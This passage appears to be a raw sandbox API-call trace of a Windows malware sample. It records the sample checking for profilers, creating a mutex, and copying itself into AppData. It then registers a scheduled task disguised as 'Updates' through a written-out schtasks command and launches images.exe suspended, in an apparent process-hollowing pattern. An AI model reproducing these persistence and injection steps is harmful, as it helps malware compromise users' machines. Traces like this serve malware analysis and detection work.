(dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4b70 [0169.257] GetCurrentProcessId () returned 0x530 [0169.257] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4bbc [0169.257] GetCurrentProcessId () returned 0x530 [0169.257] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4c24 [0169.257] GetCurrentProcessId () returned 0x530 [0169.257] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4cd8 [0169.257] GetCurrentProcessId () returned 0x530 [0169.257] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4d88 [0169.258] GetCurrentProcessId () returned 0x530 [0169.258] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4e3c [0169.258] GetCurrentProcessId () returned 0x530 [0169.258] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4eec [0169.258] GetCurrentProcessId () returned 0x530 [0169.258] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4fa0 [0169.259] GetCurrentProcessId () returned 0x530 [0169.259] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5054 [0169.259] GetCurrentProcessId () returned 0x530 [0169.259] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5108 [0169.259] GetCurrentProcessId () returned 0x530 [0169.259] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x51b8 [0169.259] GetCurrentProcessId () returned 0x530 [0169.259] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x526c [0169.260] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x531c [0169.260] GetCurrentProcessId () returned 0x530 [0169.260] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x53d0 [0169.260] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5484 [0169.261] GetCurrentProcessId () returned 0x530 [0169.261] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5538 [0169.261] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x55e8 [0169.261] GetCurrentProcessId () returned 0x530 [0169.261] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x569c [0169.261] GetCurrentProcessId () returned 0x530 [0169.261] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5750 [0169.262] GetCurrentProcessId () returned 0x530 [0169.262] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5804 [0169.262] GetCurrentProcessId () returned 0x530 [0169.262] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x58b8 [0169.262] GetCurrentProcessId () returned 0x530 [0169.262] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5968 [0169.262] GetCurrentProcessId () returned 0x530 [0169.262] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5a1c [0169.263] GetCurrentProcessId () returned 0x530 [0169.263] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5a80 [0169.263] GetCurrentProcessId () returned 0x530 [0169.263] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5acc [0169.263] GetCurrentProcessId () returned 0x530 [0169.263] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5b80 [0169.263] GetCurrentProcessId () returned 0x530 [0169.263] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5c34 [0169.264] GetCurrentProcessId () returned 0x530 [0169.264] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5ce8 [0169.264] GetCurrentProcessId () returned 0x530 [0169.264] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5d98 [0169.264] GetCurrentProcessId () returned 0x530 [0169.264] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5e4c [0169.264] GetCurrentProcessId () returned 0x530 [0169.264] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5efc [0169.265] GetCurrentProcessId () returned 0x530 [0169.265] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5fb0 [0169.265] GetCurrentProcessId () returned 0x530 [0169.265] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x6064 [0169.265] GetCurrentProcessId () returned 0x530 [0169.265] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x6118 [0169.265] GetCurrentProcessId () returned 0x530 [0169.265] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x61c8 [0169.266] GetCurrentProcessId () returned 0x530 [0169.266] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x627c [0169.266] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x632c [0169.266] GetCurrentProcessId () returned 0x530 [0169.266] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x63e0 [0169.266] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x6494 [0169.267] GetCurrentProcessId () returned 0x530 [0169.267] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x6548 [0169.267] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x65f8 [0169.267] GetCurrentProcessId () returned 0x530 [0169.267] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x66ac [0169.267] GetCurrentProcessId () returned 0x530 [0169.267] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x6760 [0169.268] GetCurrentProcessId () returned 0x530 [0169.268] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x6814 [0169.268] GetCurrentProcessId () returned 0x530 [0169.268] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x68c8 [0169.268] GetCurrentProcessId () returned 0x530 [0169.268] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x6978 [0169.269] GetCurrentProcessId () returned 0x530 [0169.269] GetCurrentProcessId () returned 0x530 [0169.269] GetCurrentProcessId () returned 0x530 [0169.269] GetCurrentProcessId () returned 0x530 [0169.269] GetCurrentProcessId () returned 0x530 [0169.270] GetCurrentProcessId () returned 0x530 [0169.270] GetCurrentProcessId () returned 0x530 [0169.270] GetCurrentProcessId () returned 0x530 [0169.270] GetCurrentProcessId () returned 0x530 [0169.270] GetCurrentProcessId () returned 0x530 [0169.271] GetCurrentProcessId () returned 0x530 [0169.271] GetCurrentProcessId () returned 0x530 [0169.271] GetCurrentProcessId () returned 0x530 [0169.271] GetCurrentProcessId () returned 0x530 [0169.272] GetCurrentProcessId () returned 0x530 [0169.272] GetCurrentProcessId () returned 0x530 [0169.272] GetCurrentProcessId () returned 0x530 [0169.272] GetCurrentProcessId () returned 0x530 [0169.273] GetCurrentProcessId () returned 0x530 [0169.273] GetCurrentProcessId () returned 0x530 [0169.273] GetCurrentProcessId () returned 0x530 [0169.273] GetCurrentProcessId () returned 0x530 [0169.274] GetCurrentProcessId () returned 0x530 [0169.274] GetCurrentProcessId () returned 0x530 [0169.274] GetCurrentProcessId () returned 0x530 [0169.274] GetCurrentProcessId () returned 0x530 [0169.274] GetCurrentProcessId () returned 0x530 [0170.486] VirtualProtect (in: lpAddress=0x1300178, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.486] VirtualProtect (in: lpAddress=0x13001a0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.486] VirtualProtect (in: lpAddress=0x13001c8, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.486] VirtualProtect (in: lpAddress=0x13001f0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.486] VirtualProtect (in: lpAddress=0x1300218, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.486] VirtualProtect (in: lpAddress=0x136512e, dwSize=0xb, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.486] VirtualProtect (in: lpAddress=0x1365122, dwSize=0xb, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.486] VirtualProtect (in: lpAddress=0x1364800, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.486] VirtualProtect (in: lpAddress=0x136513c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.486] VirtualProtect (in: lpAddress=0x1365160, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.487] VirtualProtect (in: lpAddress=0x1365168, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.487] VirtualProtect (in: lpAddress=0x136516c, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.487] VirtualProtect (in: lpAddress=0x1365174, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.487] VirtualProtect (in: lpAddress=0x1365178, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.487] VirtualProtect (in: lpAddress=0x136517c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.487] VirtualProtect (in: lpAddress=0x1365180, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.487] VirtualProtect (in: lpAddress=0x1365188, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.487] VirtualProtect (in: lpAddress=0x136518c, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.487] VirtualProtect (in: lpAddress=0x1365194, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.487] VirtualProtect (in: lpAddress=0x1365198, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.487] VirtualProtect (in: lpAddress=0x136519c, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.487] VirtualProtect (in: lpAddress=0x13651a4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.487] VirtualProtect (in: lpAddress=0x13651a8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.488] VirtualProtect (in: lpAddress=0x13651ac, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.488] VirtualProtect (in: lpAddress=0x13651b4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.488] VirtualProtect (in: lpAddress=0x13651b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.488] VirtualProtect (in: lpAddress=0x13651bc, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.488] VirtualProtect (in: lpAddress=0x13651c4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.488] VirtualProtect (in: lpAddress=0x13651c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.488] VirtualProtect (in: lpAddress=0x13651cc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.488] VirtualProtect (in: lpAddress=0x13651d0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.488] VirtualProtect (in: lpAddress=0x13651d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.488] VirtualProtect (in: lpAddress=0x13651dc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.488] VirtualProtect (in: lpAddress=0x13651e0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.488] VirtualProtect (in: lpAddress=0x13651e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.488] VirtualProtect (in: lpAddress=0x13651ec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x33d52c | out: lpflOldProtect=0x33d52c*=0x0) returned 0 [0170.499] CoTaskMemAlloc (cb=0x20c) returned 0x7fbde0 [0170.499] GetEnvironmentVariableW (in: lpName="COR_PROFILER", lpBuffer=0x7fbde0, nSize=0x104 | out: lpBuffer="Ꙑսꗰt\x02") returned 0x0 [0170.499] CoTaskMemFree (pv=0x7fbde0) [0170.499] CoTaskMemAlloc (cb=0x20c) returned 0x7fbde0 [0170.499] GetEnvironmentVariableW (in: lpName="COR_ENABLE_PROFILING", lpBuffer=0x7fbde0, nSize=0x104 | out: lpBuffer="Ꙑսꗰt\x02") returned 0x0 [0170.499] CoTaskMemFree (pv=0x7fbde0) [0170.501] GetExitCodeProcess (in: hProcess=0x5458, lpExitCode=0x2b21f80 | out: lpExitCode=0x2b21f80*=0x103) returned 1 [0170.521] NtQueryInformationProcess (in: ProcessHandle=0x5458, ProcessInformationClass=0x0, ProcessInformation=0x33d458, ProcessInformationLength=0x18, ReturnLength=0x33d454 | out: ProcessInformation=0x33d458, ReturnLength=0x33d454) returned 0x0 [0170.531] EnumProcesses (in: lpidProcess=0x2b227bc, cb=0x400, lpcbNeeded=0x33d3d4 | out: lpidProcess=0x2b227bc, lpcbNeeded=0x33d3d4) returned 1 [0171.261] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe", nBufferLength=0x105, lpBuffer=0x33d878, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe", lpFilePart=0x0) returned 0x19 [0171.266] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="wFeODqeBxkJvqrVbN") returned 0x0 [0171.280] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="wFeODqeBxkJvqrVbN") returned 0x5458 [0171.281] CoTaskMemAlloc (cb=0x20c) returned 0x7fdd40 [0171.281] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x7fdd40 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0171.281] CoTaskMemFree (pv=0x7fdd40) [0171.281] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x33d85c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpFilePart=0x0) returned 0x2d [0171.281] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", nBufferLength=0x105, lpBuffer=0x33d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", lpFilePart=0x0) returned 0x3c [0171.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x33dd50) returned 1 [0171.281] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe"), fInfoLevelId=0x0, lpFileInformation=0x33ddcc | out: lpFileInformation=0x33ddcc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x717ab990, ftCreationTime.dwHighDateTime=0x1d6a092, ftLastAccessTime.dwLowDateTime=0x717ab990, ftLastAccessTime.dwHighDateTime=0x1d6a092, ftLastWriteTime.dwLowDateTime=0x7181ddb0, ftLastWriteTime.dwHighDateTime=0x1d6a092, nFileSizeHigh=0x0, nFileSizeLow=0xb7400)) returned 1 [0171.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x33dd4c) returned 1 [0171.339] GetCurrentProcess () returned 0xffffffff [0171.339] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33dd18 | out: TokenHandle=0x33dd18*=0x4f40) returned 1 [0171.342] GetCurrentProcess () returned 0xffffffff [0171.342] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33dcec | out: TokenHandle=0x33dcec*=0x34b8) returned 1 [0171.343] GetTokenInformation (in: TokenHandle=0x4f40, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x33dd20 | out: TokenInformation=0x0, ReturnLength=0x33dd20) returned 0 [0171.343] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x7bd218 [0171.344] GetTokenInformation (in: TokenHandle=0x4f40, TokenInformationClass=0x1, TokenInformation=0x7bd218, TokenInformationLength=0x24, ReturnLength=0x33dd20 | out: TokenInformation=0x7bd218, ReturnLength=0x33dd20) returned 1 [0171.346] LocalFree (hMem=0x7bd218) returned 0x0 [0171.347] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x33dc40, DesiredAccess=0x800, PolicyHandle=0x33dc00 | out: PolicyHandle=0x33dc00) returned 0x0 [0171.348] LsaLookupSids (in: PolicyHandle=0x7bbc50, Count=0x1, Sids=0x2aacb10*=0x2aacab4*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), ReferencedDomains=0x33dc1c, Names=0x33dc10 | out: ReferencedDomains=0x33dc1c, Names=0x33dc10) returned 0x0 [0171.349] LsaClose (ObjectHandle=0x7bbc50) returned 0x0 [0171.349] LsaFreeMemory (Buffer=0x762b58) returned 0x0 [0171.350] LsaFreeMemory (Buffer=0x7ac9c0) returned 0x0 [0171.350] CoTaskMemAlloc (cb=0x20c) returned 0x7fdd40 [0171.350] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x7fdd40 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0171.351] CoTaskMemFree (pv=0x7fdd40) [0171.351] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5P5NRG~1\\", lpszLongPath=0x33d858, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x1e [0171.352] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x33d86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x31 [0171.352] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x33d7f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x31 [0171.352] CoTaskMemAlloc (cb=0x20c) returned 0x7fdd40 [0171.353] GetTempFileNameW (in: lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x7fdd40 | out: lpTempFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tmpf047.tmp")) returned 0xf047 [0171.354] CoTaskMemFree (pv=0x7fdd40) [0171.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp", nBufferLength=0x105, lpBuffer=0x33d714, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp", lpFilePart=0x0) returned 0x3c [0171.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x33dc08) returned 1 [0171.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tmpf047.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xb120 [0171.357] GetFileType (hFile=0xb120) returned 0x1 [0171.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x33dc04) returned 1 [0171.357] GetFileType (hFile=0xb120) returned 0x1 [0171.358] WriteFile (in: hFile=0xb120, lpBuffer=0x2ab0cc0*, nNumberOfBytesToWrite=0x695, lpNumberOfBytesWritten=0x33dca0, lpOverlapped=0x0 | out: lpBuffer=0x2ab0cc0*, lpNumberOfBytesWritten=0x33dca0*=0x695, lpOverlapped=0x0) returned 1 [0171.360] CloseHandle (hObject=0xb120) returned 1 [0171.361] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x7f99b0 [0171.361] LocalAlloc (uFlags=0x0, uBytes=0xca) returned 0x77d6c8 [0171.362] ShellExecuteExW (in: pExecInfo=0x2ab2020*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\ChFIQxtpqP\" /XML \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2ab2020*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\ChFIQxtpqP\" /XML \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x106a8)) returned 1 [0171.908] LocalFree (hMem=0x7f99b0) returned 0x0 [0171.908] LocalFree (hMem=0x77d6c8) returned 0x0 [0171.908] GetCurrentProcess () returned 0xffffffff [0171.908] GetCurrentProcess () returned 0xffffffff [0171.908] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x106a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x33dd00, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x33dd00*=0xc500) returned 1 [0171.909] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x33dcf8*=0xc500, lpdwindex=0x33db14 | out: lpdwindex=0x33db14) returned 0x0 [0172.657] CloseHandle (hObject=0xc500) returned 1 [0172.657] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp", nBufferLength=0x105, lpBuffer=0x33d880, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp", lpFilePart=0x0) returned 0x3c [0172.658] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tmpf047.tmp")) returned 1 [0172.671] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe", nBufferLength=0x105, lpBuffer=0x33d800, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe", lpFilePart=0x0) returned 0x19 [0172.762] CreateProcessW (in: lpApplicationName="C:\\ProgramData\\images.exe", lpCommandLine="\"{path}\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x33da40*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x33dd3c | out: lpCommandLine="\"{path}\"", lpProcessInformation=0x33dd3c*(hProcess=0x5548, hThread=0xc500, dwProcessId=0x6e0, dwThreadId=0x6b8)) returned 1 [0172.799] GetThreadContext (in: hThread=0xc500, lpContext=0x2ab2688 | out: lpContext=0x2ab2688*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), 